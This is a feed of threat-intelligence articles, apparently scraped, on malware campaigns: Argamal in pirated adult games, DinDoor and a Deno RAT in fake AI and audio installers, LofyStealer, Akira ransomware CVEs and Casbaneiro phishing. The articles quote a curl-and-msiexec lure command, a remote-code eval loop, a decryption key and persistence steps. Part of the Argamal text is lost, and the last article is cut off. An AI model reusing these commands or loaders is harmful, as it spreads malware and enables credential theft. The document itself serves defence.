In April 2026, we discovered a new malware campaign targeting players of “hentai” games. Once launched, the infected games install a previously unknown malicious implant on the user’s machine. After a few days, the implant downloads and executes a Trojan, resulting in full system compromise and broad remote control capabilities for the attackers. We dubbed this malware family “Argamal”. The malware uses COM hijacking to persist on the victim’s machine, replacing the InprocServer32 entry for Windows Color System Calibration Loader DLL. This task is triggered when the user logs in, effectively allowing the malware to run at startup. Kaspersky solutions detect this threat as Trojan.Win32.Termixia.*, Trojan.Win32.Agent.*, HEUR:Trojan.Win32.Argamal.gen and HEUR:Trojan-Downloader.Win32.Argamal.gen. Technical details Background In April, as part of our ongoing monitoring of telemetry data, we found some suspicious DLLs. Further analysis revealed that various versions of these DLLs have existed since at least 2024. The DLLs were spawned by different games written using various game engines and programming languages, including RenPy (Python) and RPG Maker MV (JavaScript), among others. However, they all had one thing in common: they were all hentai games. We searched for the distribution sources and found a number of websites hosting game screenshots and download links. These links redirected users to PixelDrain, a free file transfer service. In addition to these websites, the trojanized games have also been distributed via different torrent trackers, including AniRena. Delivery Both the dedicated websites and torrents delivered an archive containing the infected game. This archive contained fully functional, legitimate game files, as well as a modified FFmpeg DLL (SHA1: 42add9475e67a1ccc6a6af94b5475d3defc01b85), that imported the DllGetClassObject function from a file called natives2_blob.bin. Since the game needs ffmpeg.dll to run properly, the library loads as soon as the user starts the game. Script executor The natives2_blob.bin (SHA1: edce72f59e4c1d136cd1946af70d334c19df858d) file is a DLL that executes a Base64-encoded PowerShell script when loaded. This PowerShell script, which we’ll call Stage1, performs basic checks for controlled environments. For example, it checks for the Sandboxie folder in Program Files and Procmon64 in the process list. If all the checks indicate that the process is not running in a controlled environment, it proceeds to establish persistence. Stage1 sets the MI_V environment variable (and also MI_V2 in the new versions of malware) for the current user to another Base64-encoded PowerShell script, which we’ll call Stage2. After that, it sets the InprocServer32 registry key at HKCU\SOFTWARE\Classes\CLSID\{722D0F89-B69C-4700-AE8C-4A44350E4876} to a random DLL file name in a random subdirectory of %USER%\AppData\Local, as well as the ShellFolder subkey to another random DLL file name in the same location. Stage1 also creates a scheduled task that will execute three days later. This task executes Stage2 and runs once. Stage2 is a payload downloader script. It takes previously generated DLL filenames from the registry and downloads an encrypted payload called zaesdl.dat from GitHub using bitsadmin.exe. The downloaded payload is saved in the settings.dat file in the randomly chosen subdirectory of %USER%\AppData\Local. Stage2 decrypts it using AES-CBC with the key zbcd1j9234r670eh and an IV equal to the key. The decrypted payload is then saved in the DLL file specified in the ShellFolder registry subkey. The decrypted payload is set as InprocServer32 at HKCU\SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}, which is a COM object used by the \Microsoft\Windows\WindowsColorSystem\Calibration Loader scheduled task. This task runs every time a user logs in, allowing the malware to run during every user session. Before quitting, Stage2 also removes the changes made under the HKCU\SOFTWARE\Classes\CLSID\{722D0F89-B69C-4700-AE8C-4A44350E4876} registry key, unsets the MI_V environment variable (and MI_V2 in newer versions), and removes the scheduled task that launched Stage2. Malicious agent Early payload versions decrypted themselves using the 0xB0C1D4E9 rolling XOR key, where the decryption key for the i + 1 block is the encrypted content of the i block (each encrypted block being four bytes long). The most recent agent versions don’t do that. The samples we found had string encryption; they use a simple substitution with a key that corresponds position-by-position to the following alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@#$./: *&~. The decryption process involves finding the position of each symbol of the encrypted strings in the key, and replacing it with the symbol that occupies the same position in the alphabet. During our investigation, we found the following keys were used: 17htUno/I3L&fK2H#yapE@b5NqZ$Q4xmeF.s96uB>jkdWCPvAgD*XwO:iR~TMrV0YGl8z jdkWCPvAgD*XwO:iR~TMrV0YGl8z jkdWCvPAgD*XwO:iR~TrMV0YGl8z : deletes specified file DELDIR : deletes specified directory REN # : moves specified file MAKDIR : creates directory ZIPFILE /ZIPFOLDER : compresses specified file/folder into a.zip archive TAR /TAR2 : compresses specified file/folder into a .tar archive GETFILEDATE : sends file’s last modification date SETFILEDATE : sets file’s last modification date GETFILEACC : sends file’s last access date DWLOAD : sends file to the C2 UPLOAD # : uploads file to the specified C2 server Reconnaissance USER : sends username KALIVE : sends run cycle counter IDLE : sends number of seconds passed since last input activity DRIVES : sends information about mounted drives FOLDEX : sends full path to a directory of the specified type: – type = 0x63 : temporary directory – type = 0x64 : \Google\Chrome\User Data\Default\ in AppData\Local folder – type = 0x65 : \Downloads\ in user home directory – type = 0x66 : \Microsoft\Excel\XLSTART\ in AppData folder – type = 0x67 : AppData folder LFILES : lists and sends paths to all files in the directory OSVER : sends information about user, hostname, OS architecture and version COMPILERDATE : sends constant hardcoded in the RAT, e.g., 25.10.2025 Generic control DSOCKE : recreates TCP keep-alive socket QUIT : notifies the C2 about quitting, closes the socket and stops the process RUNHID /RUN : runs specified command insideShellExecuteW RUNDOS : runs specified command inside CreateProcessW RUNTASK : creates, runs and deletes task that executes specified command SKEY : presses specified key MOUSE FREEZE : freezes mouse movement MOUSE : clicks the specified mouse button or sets the cursor position to the specified coordinates Other delivery methods During our research, we also observed other delivery methods for the RAT. Instead of patching FFmpeg and downloading the payload from GitHub, the attackers included the main payload as libpython64.dat or another file with a similar name in the lib\py3-windows-x86_64 directory of the game. This .dat file was loaded by one of the libraries used in the game, which was patched for this purpose. In another case, the threat actor posted their malicious DLL file (payload downloader) on a gaming forum, disguising it as a cheat. Infrastructure Our research revealed the following infrastructure was used in this attack. Victims According to our telemetry, hundreds of individuals were infected with this malware. The majority of the victims were located in Russia, Brazil, Germany and Vietnam. Attribution Based on the language of the comments in the code, infrastructure data and other facts we assess with medium confidence that the developer of the downloader chain speaks Spanish. The actor behind this attack uses Spanish in variable names and comments. For example, the Base64-decoded delivery script contains the following lines: In addition, the JavaScript code from the website distributing infected games contains variable names, function names and comments in Spanish: Notably, the malware payloads used in this attack had previously chosen 127.0.0.1 as their C2 server when the victim’s default locale is set to “zh-CN”, thus not targeting Chinese users. This may indicate that the attacker is associated with a Chinese-speaking threat actor or uses payloads developed by a Chinese-speaking threat actor. However, we still believe it’s unlikely that the developer of these delivery chains is Chinese-speaking. Conclusions The Argamal Trojan is a new RAT targeting individuals who seek adult games. During our analysis, we observed a steady stream of updates to the payload, including the addition of new features and fixes for various bugs, as well as changes to the infrastructure. This leads us to believe that the threat actor behind this malware will continue to develop and enhance it. The campaign’s goal is likely data and credential theft; however, the RAT enables the attacker to take full control of the device and execute any malicious activity they want. Creating malware in today’s development landscape has become significantly easier thanks to the wide availability of detailed guides, tooling, and automation resources. As a result, it is crucial not only to detect known malware but also to identify new and evolving threats as they emerge. Kaspersky solutions prevented the malicious activity in the earliest stages of the attack. The solutions help ensure device security by identifying not only known threats but also the behavior of the software and its actions, providing comprehensive protection against malware. Indicators of Compromise Additional information about this activity, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact [email protected]. Trojan downloaders: 9803604ec45f31f9ef75bcca1e1310d8ac1fc3a6 edce72f59e4c1d136cd1946af70d334c19df858d 02819d200d1424882af81cb504b3e8614b32397a Domains and IPs asper1[.]freeddns[.]org Winst0[.]kozow[.]com Country1[.]ignorelist[.]com 186[.]158.223.35 GitHub repositories used in the campaign hxxps://github[.]com/gmz159/u hxxps://github[.]com/DnyP/files hxxps://github[.]com/mgzv/p
securelist.comJun 3, 2026extracted
Fake software on GitHub and SourceForge distribute Deno RAT
During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as DinDoor. Attackers are using compromised YouTube channels to distribute links to these platforms. DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime. Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure. These campaigns use Scoop (an alternative installer for Windows) and WinGet (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT capable of executing additional payloads, exfiltrating data from browsers, wallets, and other applications, which has an interesting peer-to-peer feature that uses Edge to hide malicious traffic. Legitimate platforms abused to spread malware The infection chain is usually started via MSI files or PowerShell scripts downloaded from GitHub or SourceForge in most of the analyzed cases. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views. The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware. The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We’ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, Kontakt. The malicious repositories have a command for both Windows and macOS. These repositories ask users to open the terminal and copy a malicious command, which downloads and executes the MSI from GitHub. Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users. We found that the same backdoor was distributed through SourceForge, mimicking a legitimate game software called GearUP and an AI watermark remover software called BWR. How to stay safe The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing. Here are a few simple ways to stay safe: Only download software from official vendor websites. Be skeptical of “free”, cracked, or unofficial versions of paid software. Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts. Attackers continue to create new profiles to distribute this malware across platforms. Check the developer or publisher’s profile, its reputation, and how recently it was created before downloading anything. Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns. Check the file’s publisher and digital signature before you run it. Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. Technical analysis The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via msiexec. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain. Example of a malicious command hosted on GitHub that starts the infection chain: curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi The MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI InstallationFolder and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files. The CMD file executes the PowerShell script, with a name that changes in the analyzed infection chains: @set "SCRIPTDIR=%~dp0" @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden" The PowerShell script takes care of: Ensuring the package manager Scoop is installed, and installing it if missing with the official script from get.scoop.sh . Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows. Using Scoop to install WinGet (Windows Package Manager) if missing. Installs Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if not present. The usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility. Command executed to install Deno using WinGet: "C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent The DinDoor Backdoor Next, the following stage is executed with the downloaded Deno executable: "C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js The returned code (the internal name is “launcher-1”) is a small eval-loop function that downloads the next stage (the internal name is “launcher-2”). The downloaded backdoor is publicly known as DinDoor. var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))} The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2. The HTTP endpoints used for C2 communications vary between the analyzed cases. The backdoor obtains an ID from an HTTP endpoint (for example, /security-pool) and then uses that ID to obtain the next stage from /v2{ID}.js. The obtained stage is executed via stdin without being written to disk, using the command: deno run -A --no-check – To achieve persistence, the backdoor runs a PowerShell command to create a RUN key that executes the downloader “launcher-1” used previously: conhost.exe --headless " " -A "%APPDATA%\ .js This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime. Deno RAT The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module. We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as “Smokest” based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team. Picked up something you shouldn’t have? In addition to HTTP for C2 communication, the RAT also supports WebSocket communication, enabled when the JSON value isLiveEnabled returned from the C2 is set to true. The RAT supports different commands (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) and functionality: Collect system information about the compromised device Full bidirectional control through a custom VNC implementation over WebSocket Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and Chromodo Exfiltrate Telegram, Discord, and Lightcord data Record and modify clipboard data List folders, files and exfiltrate content from files with specific extensions Capture screenshots using different methods Execute additional payloads Launch or terminate arbitrary processes Execute commands with PowerShell Establish SOCKS5 proxy tunnels over WebSocket One of the most interesting parts of the RAT is a peer-to-peer streaming mode that uses the Edge browser to hide traffic and make detection more difficult. To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket. The RAT uses the following endpoints for C2 communication, which can vary between samples: /health : checks the “ok” response from the C2 /token : receive config parameters, task delivery, results, and exfiltrated data /vnc/agent/ : WebSocket path used for VNC communication The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data: { "buildId": "cd361ef3159f5ce9", "buildNote": "BWR", "buildType": "msi-v2", "proxyUrls": ["{C2}"], "userId": "…", "accessTokenHash": "…", "iat": 1779372546, "exp": 2094948546 } We found different versions of this RAT, including a “light” version called “agent-lite” that supports only a few commands and uses Cloudflare Workers for C2 communication. Acknowledgements DinDoor: https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis Smokest: https://x.com/vxunderground/status/2013006601133687004 Indicators of Compromise (IOCs) URLs https[:]//github.com/claude-free-plugin/ https[:]//github.com/ai-gen-profi https[:]//github.com/wharfdemolisherpit https[:]//sourceforge.net/projects/gearup/ https[:]//sourceforge.net/projects/bluewaveremover/ Domains claudescript[.]top : distribution website ms-telemetry-gateway-us[.]com : C2 dakatawebstick[.]com : C2 ashpaltlonpro[.]com : C2 cf-proxy[.]cloud-analytics-services[.]workers.dev : C2 agilemast3r[.]duckdns[.]org : C2 geralnewlong[.]com : C2 hngfbgfbfb[.]cyou : C2 logicalnewrestore[.]com : C2 IPs 23[.]227[.]196[.]107 : C2 45[.]137[.]99[.]121 : C2 31[.]57[.]129[.]23 : C2 66[.]78[.]40[.]107 : C2 193[.]233[.]198[.]132 : C2 From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
malwarebytes.comMay 26, 2026extracted
Brazilian LofyGang Resurfaces After Three Years With Minecraft LofyStealer Campaign
A cybercrime group of Brazilian origin has resurfaced after more than three years to orchestrate a campaign that targets Minecraft players with a new stealer called LofyStealer (aka GrabBot). "The malware disguises itself as a Minecraft hack called 'Slinky,'" Brazil-based cybersecurity company ZenoX said in a technical report. "It uses the official game icon to induce voluntary execution, exploiting the trust of young users in the gaming scene." The activity has been attributed with high confidence to a threat actor known as LofyGang, which was observed leveraging typosquatted packages on the npm registry to push stealer malware in 2022, specifically with an intent to siphon credit card data and user accounts associated with Discord Nitro, gaming, and streaming services. The group, believed to be active since late 2021, advertises their tools and services on platforms like GitHub and YouTube, while also contributing to an underground hacking community under the alias DyPolarLofy to leak thousands of Disney+ and Minecraft accounts. "Minecraft has been a LofyGang target since 2022," Acassio Silva, co-founder and head of threat intelligence at ZenoX, told The Hacker News. "They leaked thousands of Minecraft accounts under the DyPolarLofy alias on Cracked.io. The current campaign goes after Minecraft players directly through a fake 'Slinky' hack." The attack begins with a Minecraft hack that, when launched, triggers the execution of a JavaScript loader that's ultimately responsible for the deployment of LofyStealer ("chromelevator.exe") on compromised hosts and execute it directly in memory with an aim to harvest a wide range of sensitive data spanning multiple web browsers, including Google Chrome, Chrome Beta, Microsoft Edge, Brave, Opera, Opera GX, Mozilla Firefox, and Avast Browser. The captured data, which includes cookies, passwords, tokens, cards, and International Bank Account Numbers (IBANs), is exfiltrated to a command-and-control (C2) server located at 24.152.36[.]241. "Historically, the group's primary vector was the JavaScript supply chain: NPM package typosquatting, starjacking (fraudulent references to legitimate GitHub repositories to inflate credibility), and payloads embedded in sub-dependencies to evade detection," ZenoX said. "The focus was on Discord token theft, Discord client modification for credit card interception, and exfiltration via webhooks abusing legitimate services (Discord, Repl.it, Glitch, GitHub, and Heroku) as C2." The latest development marks a departure from previously observed tradecraft and a shift towards a malware-as-a-service (MaaS) model with free and premium tiers, along with a bespoke builder called Slinky Cracked that's used as a delivery vehicle for the stealer malware. The disclosure comes as threat actors are increasingly abusing the ubiquity and trust associated with GitHub to host bogus repositories that act as lures for malware families like SmartLoader, StealC Stealer, and Vidar Stealer. Unsuspecting users are directed to these repositories through techniques like SEO poisoning. In some cases, attackers have been found to spread Vidar 2.0 through Reddit posts advertising fake Counter-Strike 2 game cheats, redirecting victims to a malicious website that delivers a ZIP archive containing the malware. "This infostealer campaign highlights an ongoing security challenge where widely trusted platforms are abused to distribute malicious payloads," Acronis said in an analysis published last month. "By taking advantage of social trust and common download channels, threat actors are often able to bypass traditional security solutions." The findings add to a growing list of campaigns that have leveraged GitHub in recent months - Targeting developers directly inside GitHub, using fake Microsoft Visual Studio Code (VS Code) security alerts posted through Discussions to trick users into installing malware by clicking on a link. "Because GitHub Discussions trigger email notifications for participants and watchers, these posts are also delivered directly to developers' inboxes," Socket said. "This extends the reach of the campaign beyond GitHub itself and makes the alerts appear more legitimate." Targeting Argentina's judicial systems using spear‑phishing emails to distribute a compressed ZIP archive that uses an intermediate batch script to retrieve a remote access trojan (RAT) hosted on GitHub. Creating GitHub accounts and OAuth applications, followed by opening an issue that mentions a target developer, triggering an email notification that, in turn, tricks them into authorizing the OAuth app, effectively allowing the attacker to obtain their access tokens. The issues aim to induce a false sense of urgency, warning users of unusual access attempts. Using fraudulent GitHub repositories to distribute malicious batch script installers masquerading as legitimate IT and security software, leading to the deployment of the TookPS downloader, which then initiates a multi-stage infection chain to establish persistent remote access using SSH reverse tunnels and RATs like MineBridge RAT (aka TeviRAT). The activity has been attributed to Rift Brigantine (aka FIN11, Graceful Spider, and TA505). Using counterfeit GitHub repositories posing as AI tools, game cheats, Roblox scripts, phone number location trackers, and VPN crackers to distribute LuaJIT payloads that function as a generic trojan as part of a campaign dubbed TroyDen's Lure Factory. "The breadth of the lure factory – gaming cheats, developer tools, phone trackers, Roblox scripts, VPN crackers – suggests an actor optimizing for volume across audiences rather than precision targeting," Netskope said. "Defenders should treat any GitHub-hosted download that pairs a renamed interpreter with an opaque data file as a high-priority triage candidate, regardless of how legitimate the surrounding repository looks."
thehackernews.comApr 28, 2026extracted
Akira: campagne di sfruttamento sistematico di vulnerabilità perimetrali e accessi VPN
Akira: campagne di sfruttamento sistematico di vulnerabilità perimetrali e accessi VPN Bollettino BL01/260413/CSIRT-ITA Sintesi Da inizio 2026 ad oggi questo CSIRT ha registrato ,nel contesto nazionale, un aumento significativo di attacchi ransomware attribuibili al gruppo AKIRA, con 13 incidenti confermati, i cui principali target sono identificati tra le piccole e medie imprese. Le analisi svolte confermano lo sfruttamento attivo di vulnerabilità n-day non patchate presenti su dispositivi perimetrali, con una particolare predilezione per i firewall SonicWall, e la compromissione sistematica di servizi SSL VPN esposti. Tali elementi risultano pienamente coerenti con le tattiche, tecniche e procedure (TTP) attribuite al gruppo che, storicamente, sfrutta punti deboli in soluzioni di sicurezza per ottenere accesso iniziale e consolidare la propria presenza all’interno degli ambienti compromessi. Descrizione Approfondimento Operativo: Gruppo AKIRA AKIRA è un'organizzazione criminale Ransomware-as-a-Service (RaaS) emersa nel marzo 2023. Le analisi di cyber threat intelligence suggeriscono che l’organizzazione rappresenti uno spin-off del gruppo Conti dissoltosi nel maggio 2022 a seguito di leak interni. AKIRA si posiziona ai vertici mondiali per volume di attacchi ed efficacia tecnica. Il vettore di ingresso primario è rappresenatato dallo sfruttamento di vulnerabilità note (n-day) che interessano gli edge device. Nella fase di post-exploitation il gruppo applica tattiche "living-off-the-land" (LOLBins) abusando di strumenti legittimi preinstallati oltre a distribuire tool di amministrazione remota legittimi quali AnyDesk, BloodHound e Impacket al fine di ottenere persistenza, mappare la rete ed esfiltrare dati. Dal punto di vista dello sviluppo i primi payload utilizzati dal gruppo, scritti in C++, cifrano i file con estensione ".akira" e depositano una nota di riscatto denominata "akira_readme.txt". Il rilascio di un decryptor funzionante da parte di Avast nel giugno 2023 ha costretto l'organizzazione ad evolversi. Dall'agosto 2023 è operativa una nuova variante, in codice Rust, denominata "Megazord", che appende al nome del file l’estensione ".powerranges". Attualmente, le due varianti (C++ e Rust) risultano impiegate simultaneamente o in modo alternato per garantire la massima flessibilità ed efficacia dell’attacco. Correlazioni e Modalità di Compromissione Rilevate L’analisi dei 13 incidenti trattati in ambito nazionale rivela la presenza di vulnerabilità n-day non patchate nei sistemi di protezione di rete utilizzati dalle vittime ed evidenzia tre direttrici principali di compromissione: Violazione del Perimetro: Il principale punto di ingresso utilizzato dal gruppo negli attacchi analizzati risiede nell'esposizione di interfacce SSL VPN e apparati firewall non correttamente patchati. Oltre allo sfruttamento attivo di vulnerabilità note, in alcuni degli incidenti trattati il gruppo ha utilizzato credenziali valide per l’accesso in VPN spesso appartenenti a consulenti esterni e fornitori software. Cifratura dei sistemi di Virtualizzazione e Backup: Una volta ottenuto l’accesso persistente ai sistemi, il gruppo procede con la fase di impatto attraverso la cifratura degli hypervisor (es. VMware ESXi, VCenter etc) cifrando i datastore e bloccando di conseguenza l’operatività delle VM. Da notare che quando possibile, ad esempio in presenza di backup online, il gruppo procede anche alla cifratura degli stessi in modo da rendere più complesse, o impossibili, le attività di ripristino. Sfruttamento dei Blind Spot EDR: In casi circoscritti, l’attore è riuscito comunque a perpetrare l’attacco sfruttando lacune nella copertura degli endpoint con sistemi di protezione avanzata (EDR). Si evidenzia come tali soluzioni rappresentino una delle ultime linee di difesa qualora il threat actor abbia ottenuto accesso alla rete target, risultando quindi particolarmente cruciali per la protezione degli asset critici, come i sistemi di autenticazione Active Directory. Analisi delle Vulnerabilità Si riportano di seguito le vulnerabilità comunemente utilizzate dal gruppo: SonicWall SonicOS: identificata tramite la CVE-2024-40766, di tipo “Improper Access Control” e con score CVSS v3.1 pari a 9.3. Tale vulnerabilità, che interessa le appliance SonicWall Gen 5, Gen 6 e Gen 7, è causata da un'inadeguata gestione del controllo degli accessi sull'interfaccia di management. Nel dettaglio, un attaccante remoto non autenticato, potrebbe sfruttare tale vulnerabilità per ottenere l'accesso non autorizzato alle risorse e, in specifiche condizioni, causare anche il crash del firewall. Cisco ASA e FTD: identificata tramite la CVE-2023-20269, di tipo “Authentication Bypass” e con score CVSS v3.1 pari a 5.0. Tale vulnerabilità interessa la funzionalità VPN di accesso remoto ed è dovuta ad un’inadeguata separazione dei processi di autenticazione, autorizzazione e accounting (AAA). Nel dettaglio, un attaccante remoto non autenticato, potrebbe inviare richieste opportunamente predisposte e continue, al fine di condurre un attacco di tipo brute-force, riuscendo a stabilire una sessione clientless SSL VPN senza autorizzazione sui servizi interessati. Cisco ASA e FTD: identificata tramite la CVE-2020-3259, di tipo “Information Disclosure” e con score CVSS v3.1 pari a 7.5, interessa l'interfaccia web dei dispositivi. Un attaccante remoto non autenticato, sfruttando una gestione del buffer relativo alla richieste HTTP/HTTPS non ottimale, può inviare richieste GET opportunamente predisposte al fine di accedere a locazioni di memoria tipicamente non consentite e ottenere informazioni sensibili. Veeam Backup & Replication: identificata tramite la CVE-2024-40711, di tipo “Deserialization of Untrusted Data” e con score CVSS v3.1 pari a 9.8. Tale vulnerabilità interessa l'infrastruttura di backup Veeam ed è causata dalla deserializzazione di dati, ricevuti dai servizi di backup/replica, senza adeguata validazione strutturale degli stessi. Un attaccante remoto non autenticato può inviare dati opportunamente predisposti tramite questi servizi; lo sfruttamento consente l’esecuzione di codice arbitrario da remoto (RCE), al fine di assumere il controllo completo dei servizi interessati. VMware ESXi: identificata tramite la CVE-2024-37085, di tipo “Authentication Bypass” e con score CVSS v3.1 pari a 6.8. Tale vulnerabilità interessa gli host ESXi integrati con Active Directory ed è causata da una gestione errata nella validazione dei gruppi di sistema. Nel dettaglio, un attaccante remoto autenticato, operante con privilegi sufficienti in AD, potrebbe ricreare un gruppo eliminato (es. 'ESXi Admins') per eludere i controlli di sicurezza, ottenendo privilegi amministrativi elevati sui sistemi target. Veeam Backup & Replication: identificata tramite la CVE-2023-27532, di tipo “Missing Authentication for Critical Function” e con score CVSS v3.1 pari a 7.5. Tale vulnerabilità interessa i componenti dell'infrastruttura Veeam ed è causata dalla mancanza di meccanismi di autenticazione sull'interfaccia TCP 9401. Nel dettaglio, un attaccante remoto non autenticato, operante all'interno del perimetro di rete, potrebbe inviare richieste opportunamente predisposte per estrarre le credenziali archiviate e ottenere l'accesso ai sistemi interessati. Criticità, Superficie di Esposizione e Azioni di Mitigazione I casi trattati evidenziano come gli edge device, in particolare i sistemi di protezione perimetrale, debbano essere costantemente e tempestivamente aggiornati, nonché opportunamente configurati (evitando misconfiguration o impostazioni di default non verficate) in quanto rappresentano la prima linea di difesa di una rete. Si raccomanda pertanto l’applicazione di quanto di seguito riportato specificando che la mancata, parziale o ritardata implementazione di opportune contromisure non deve essere considerata come una consapevole accettazione del rischio ma come un significativo aumento della probabilità di compromissione dell’infrastruttura: Applicazione degli aggiornamenti di sicurezza, in particolare per gli edge device, hypervisor ESXi e server di backup. Dispositivi non aggiornabili devono essere rimossi e sostituiti quanto prima; Implementazione di ”autenticazione a più fattori” (MFA) su ogni accesso remoto, VPN o interfaccia esposta e per tutti gli utenti; Suddivisione logica dei path di rete (es. tramite vlan dedicate e non ruotate), delle credenziali (disaccoppiamento tra i domini di autenticazione) e dei dispositivi (es. utilizzo di PAW) utilizzati per le attività di amministrazione della rete nel suo complesso rispetto a quelli in uso per i servizi corporate; Estensione della copertura EDR a tutti gli endpoint dell'organizzazione. Qualsiasi host connesso alla rete sprovvisto di EDR costituisce un punto critico sul quale non si ha alcuna visibilità; Adozione di copie di backup offline (cold-storage) con credenziali dedicate, possibilmente immutable, al fine di assicurare la piena capacità di ripristino anche in presenza di un incidente ransomware. Infine si consiglia di valutare la verifica e l’implementazione, sui propri apparati di sicurezza, degli Indicatori di Compromissione (IoC)[1] forniti nell’apposita sezione. [1] Per definizione, non tutti gli indicatori di compromissione sono malevoli. Questo CSIRT non ha alcuna responsabilità per l'attuazione di eventuali azioni proattive (es. inserimento degli IoC in blocklist) relative agli indicatori forniti. Le informazioni contenute in questo documento rappresentano la migliore comprensione della minaccia al momento del rilascio. Criticità Alto (70.0) Data pubblicazione 13/04/26 ore 12:29 Data Ultimo Aggiornamento 14/04/26 ore 9:17
acn.gov.itApr 13, 2026extracted
Casbaneiro Phishing Targets Latin America and Europe Using Dynamic PDF Lures
A multi-pronged phishing campaign is targeting Spanish-speaking users in organizations across Latin America and Europe to deliver Windows banking trojans like Casbaneiro (aka Metamorfo) via another malware called Horabot. The activity has been attributed to a Brazilian cybercrime threat actor tracked as Augmented Marauder and Water Saci. The e-crime group was first documented by Trend Micro in October 2025. "This threat group employs a wider-ranging attack model focused on a bespoke delivery and propagation mechanism that includes WhatsApp, ClickFix techniques, and email-centric phishing," BlueVoyant security researchers Thomas Elkins and Joshua Green said in a technical breakdown published Tuesday. "It is now evident that while these Brazil-based operators heavily leverage script-based WhatsApp automation to compromise retail and consumer users in Latin America, they concurrently maintain and deploy an advanced, email-hijacking engine to penetrate enterprise perimeters there and Europe as well." The starting point of the campaign is a phishing email that employs court summons-themed messages to deceive recipients into opening a password-protected PDF attachment. Clicking on an embedded link in the document directs the victim to a malicious link and initiates an automatic download of a ZIP archive, which, in turn, leads to the execution of interim HTML Application (HTA) and VBS payloads. The VBS script is designed to carry out environment and anti-analysis checks similar to those found in Horabot artifacts, including checks for Avast antivirus software, and proceeds to retrieve next-stage payloads from a remote server. Among the downloaded files are AutoIt-based loaders, each of which extracts and runs encrypted payload files with ".ia" or ".at" extensions to eventually launch two malware families: Casbaneiro ("staticdata.dll") and Horabot ("at.dll"). While Casbaneiro is the primary payload, Horabot is used as a propagation mechanism for the malware. Casbaneiro's Delphi DLL module contacts a command-and-control (C2) server to fetch a PowerShell script that employs Horabot to distribute the malware via phishing emails to harvested contacts from Microsoft Outlook. "Rather than distributing a static file or hardcoded link as seen in older Horabot campaigns, this script initiates an HTTP POST request to a remote PHP API 